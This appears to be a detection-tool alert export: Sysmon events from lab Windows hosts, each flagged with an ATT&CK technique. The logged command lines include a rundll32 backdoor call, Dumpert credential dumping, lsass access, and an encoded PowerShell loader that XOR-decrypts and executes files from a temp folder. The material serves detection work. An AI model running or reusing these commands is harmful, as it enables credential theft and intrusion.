"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"Found User (PC04\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding )",1,"
1
5
4
1
0
0x8000000000000000
5275
Microsoft-Windows-Sysmon/Operational
PC04.example.corp
2019-03-17 20:18:09.593
365ABB72-AB81-5C8E-0000-00102E9E0C00
3892
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
C:\Windows\system32\
PC04\IEUser
365ABB72-A960-5C8E-0000-002004C00300
0x3c004
1
High
MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-173D-5C8F-0000-00102A6A0000
608
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"Found User (PC04\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding )",1,"
1
5
4
1
0
0x8000000000000000
5275
Microsoft-Windows-Sysmon/Operational
PC04.example.corp
2019-03-17 20:18:09.593
365ABB72-AB81-5C8E-0000-00102E9E0C00
3892
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
C:\Windows\system32\
PC04\IEUser
365ABB72-A960-5C8E-0000-002004C00300
0x3c004
1
High
MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-173D-5C8F-0000-00102A6A0000
608
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.110469,2019-05-27T05:29:17.110469+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppools /text:name ),1,"
1
5
4
1
0
0x8000000000000000
5880
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:17.070
365ABB72-3D6D-5CEB-0000-0010575CFF00
2644
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list apppools /text:name
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606809.977481,2019-04-18T21:00:09.977481+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"
7
3
4
7
0
0x8000000000000000
23
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1003,technique_name=Credential Dumping
2019-04-18 16:58:14.781
365ABB72-AC28-5CB8-0000-0010F3F70700
1200
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\vaultcli.dll
6.1.7600.16385 (win7_rtm.090713-1255)
Credential Vault Client Library
Microsoft® Windows® Operating System
Microsoft Corporation
SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56
true
Microsoft Windows
Valid
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557770599.681478,2019-05-13T22:03:19.681478+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( /c notepad.exe ),1,"
1
5
4
1
0
0x8000000000000000
17286
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-13 18:03:19.482
365ABB72-B167-5CD9-0000-0010EE150C00
2372
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
/c notepad.exe
C:\Windows\system32\
IEWIN7\IEUser
365ABB72-B0EC-5CD9-0000-0020DE330100
0x133de
1
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-B0EC-5CD9-0000-0010D9D20000
944
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
1
5
4
1
0
0x8000000000000000
243547
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.122
747F3D96-9F69-5E75-0000-0010DE732000
6400
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606809.977481,2019-04-18T21:00:09.977481+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"
7
3
4
7
0
0x8000000000000000
23
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1003,technique_name=Credential Dumping
2019-04-18 16:58:14.781
365ABB72-AC28-5CB8-0000-0010F3F70700
1200
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\vaultcli.dll
6.1.7600.16385 (win7_rtm.090713-1255)
Credential Vault Client Library
Microsoft® Windows® Operating System
Microsoft Corporation
SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56
true
Microsoft Windows
Valid
",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243547
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.122
747F3D96-9F69-5E75-0000-0010DE732000
6400
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243547
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.122
747F3D96-9F69-5E75-0000-0010DE732000
6400
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1003.001] Credential dump Thread Open to Lsass,1556628223.784179,2019-04-30T16:43:43.784179+04:00,,Threat,Critical,Process ( \\VBOXSVR\HTools\voice_mail.msg.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8,"
8
2
4
8
0
0x8000000000000000
9060
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 12:43:43.784
365ABB72-4055-5CC8-0000-0010769D0B00
1532
\\VBOXSVR\HTools\voice_mail.msg.exe
365ABB72-3FE0-5CC8-0000-00107E590000
492
C:\Windows\System32\lsass.exe
1744
0x001A0000
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436014.483714,2019-07-30T01:33:34.483714+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll ),1,"
1
5
4
1
0
0x8000000000000000
4923
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:34.234
747F3D96-662E-5D3F-0000-0010C2048900
1976
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1077] Windows Admin Shares - Process - Created,1584794155.89745,2020-03-21T16:35:55.897450+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net start CDPSvc ),1,"
1
5
4
1
0
0x8000000000000000
244336
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 12:35:55.872
747F3D96-0A2B-5E76-0000-0010C02A3D00
7072
C:\Windows\System32\net.exe
10.0.17763.1 (WinBuild.160101.0800)
Net Command
Microsoft® Windows® Operating System
Microsoft Corporation
net.exe
net start CDPSvc
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-06A4-5E76-0000-002043DE0200
0x2de43
1
High
SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07
747F3D96-077C-5E76-0000-0010A5BA2300
5068
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.000311,2019-05-27T05:29:17.000311+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\InetSRV\appcmd.exe" list vdir /text:physicalpath ),1,"
1
5
4
1
0
0x8000000000000000
5877
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:16.960
365ABB72-3D6C-5CEB-0000-00107257FF00
3484
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\InetSRV\appcmd.exe" list vdir /text:physicalpath
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABl
AD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump)",1,"
1
5
4
1
0
0x8000000000000000
238378
Microsoft-Windows-Sysmon/Operational
alice.insecurebank.local
2019-06-21 07:35:50.093
ECAD0485-88D6-5D0C-0000-001007AA1D00
1568
C:\Windows\System32\rundll32.exe
6.3.9600.17415 (winblue_r4.141028-1500)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump
C:\Users\administrator\Desktop\x64\
insecurebank\Administrator
ECAD0485-87E3-5D0C-0000-0020266A0F00
0xf6a26
2
High
SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C
ECAD0485-8897-5D0C-0000-0010A2FA1C00
3964
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"Found User (insecurebank\Administrator) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump )",1,"
1
5
4
1
0
0x8000000000000000
238378
Microsoft-Windows-Sysmon/Operational
alice.insecurebank.local
2019-06-21 07:35:50.093
ECAD0485-88D6-5D0C-0000-001007AA1D00
1568
C:\Windows\System32\rundll32.exe
6.3.9600.17415 (winblue_r4.141028-1500)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump
C:\Users\administrator\Desktop\x64\
insecurebank\Administrator
ECAD0485-87E3-5D0C-0000-0020266A0F00
0xf6a26
2
High
SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C
ECAD0485-8897-5D0C-0000-0010A2FA1C00
3964
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"Found User (insecurebank\Administrator) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump )",1,"
1
5
4
1
0
0x8000000000000000
238378
Microsoft-Windows-Sysmon/Operational
alice.insecurebank.local
2019-06-21 07:35:50.093
ECAD0485-88D6-5D0C-0000-001007AA1D00
1568
C:\Windows\System32\rundll32.exe
6.3.9600.17415 (winblue_r4.141028-1500)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump
C:\Users\administrator\Desktop\x64\
insecurebank\Administrator
ECAD0485-87E3-5D0C-0000-0020266A0F00
0xf6a26
2
High
SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C
ECAD0485-8897-5D0C-0000-0010A2FA1C00
3964
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript running script,1567169648.171875,2019-08-30T16:54:08.171875+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript c:\ProgramData\memdump.vbs notepad.exe) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (C:\Windows\System32\cmd.exe) in directory : ( C:\Windows\system32\ )",1,"
1
5
4
1
0
0x8000000000000000
32151
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-30 12:54:07.823
747F3D96-1C6F-5D69-0000-0010323C1F00
2576
C:\Windows\System32\cscript.exe
5.812.10240.16384
Microsoft ® Console Based Script Host
Microsoft ® Windows Script Host
Microsoft Corporation
cscript c:\ProgramData\memdump.vbs notepad.exe
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-1B6A-5D69-0000-0020E5810E00
0xe81e5
1
High
SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC
747F3D96-1B6C-5D69-0000-00106F060F00
2128
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436014.411034,2019-07-30T01:33:34.411034+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll ),1,"
1
5
4
1
0
0x8000000000000000
4922
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:34.216
747F3D96-662E-5D3F-0000-001011038900
6020
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556380674.165738,2019-04-27T19:57:54.165738+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c del /q "C:\Users\IEUser\Downloads\Flash_update.exe" ),1,"
1
5
4
1
0
0x8000000000000000
6622
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1059,technique_name=Command-Line Interface
2019-04-27 15:57:54.087
365ABB72-7C02-5CC4-0000-0010FD6E0C00
3188
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\cmd.exe" /c del /q "C:\Users\IEUser\Downloads\Flash_update.exe"
C:\Users\IEUser\AppData\Roaming\
IEWIN7\IEUser
365ABB72-7AB1-5CC4-0000-0020BEF40000
0xf4be
1
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-7C01-5CC4-0000-00102B3E0C00
2680
C:\Users\IEUser\Downloads\Flash_update.exe
"C:\Users\IEUser\Downloads\Flash_update.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1112] process updating fDenyTSConnections or UserAuthentication registry key values,1552853889.282593,2019-03-18T00:18:09.282593+04:00,,Threat,High,[T1112] process updating fDenyTSConnections or UserAuthentication registry key values,13,"
13
2
4
13
0
0x8000000000000000
5267
Microsoft-Windows-Sysmon/Operational
PC04.example.corp
SetValue
2019-03-17 20:18:09.272
365ABB72-AB70-5C8E-0000-0010DF1F0A00
3700
C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe
HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections
DWORD (0x00000000)
",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,Critical,"Found User (IIS APPPOOL\DefaultAppPool) run Suspicious PowerShell commands that include ( -enc , -noni ,-noni,-nop,powershell,\Windows\System32,ls, -t , -w ) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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) and Parent Image :C:\Windows\System32\inetsrv\w3wp.exe , Parent CommandLine (c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20) in directory : ( C:\Windows\Temp\ )",1,"
1
5
